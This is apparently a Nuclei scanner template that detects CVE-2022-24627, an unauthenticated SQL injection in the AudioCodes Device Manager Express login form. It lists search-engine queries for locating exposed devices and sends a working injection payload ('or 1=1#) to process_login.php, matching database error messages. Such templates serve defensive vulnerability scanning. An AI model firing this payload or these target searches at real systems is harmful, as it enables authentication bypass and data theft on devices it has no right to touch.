id: CVE-2022-24627 info: name: AudioCodes Device Manager Express - SQL Injection author: geeknik severity: critical description: | An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form. impact: | Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system. remediation: | Update AudioCodes Device Manager Express to a version newer than 7.8.20002.47752 that uses parameterized queries and properly validates input. reference: - https://seclists.org/fulldisclosure/2023/Feb/12 - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24627 cwe-id: CWE-89 epss-score: 0.4897 epss-percentile: 0.97841 cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: audiocodes product: device_manager_express shodan-query: - title:"Audiocodes" - http.title:"audiocodes" fofa-query: title="audiocodes" google-query: intitle:"audiocodes" tags: cve,cve2022,seclists,sqli,audiocodes,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl dsl: - 'contains(tolower(body), "audiocodes")' internal: true - raw: - | POST /admin/AudioCodes_files/process_login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin&password=&domain=&p=%5C%27or+1%3D1%23 matchers: - type: word part: body words: - "SQL syntax" - "mysql_fetch" - "You have an error in your SQL syntax" condition: or # digest: 490a00463044022064e32d48c75078284dc543354fd31e13557086393bb0bc8b96ec0768e0c42888022017edffc3c583ddf030c8d41a2356749855323e8d02f486f7d350f186bd11a677:922c64590222798bb761d5b6d8e72950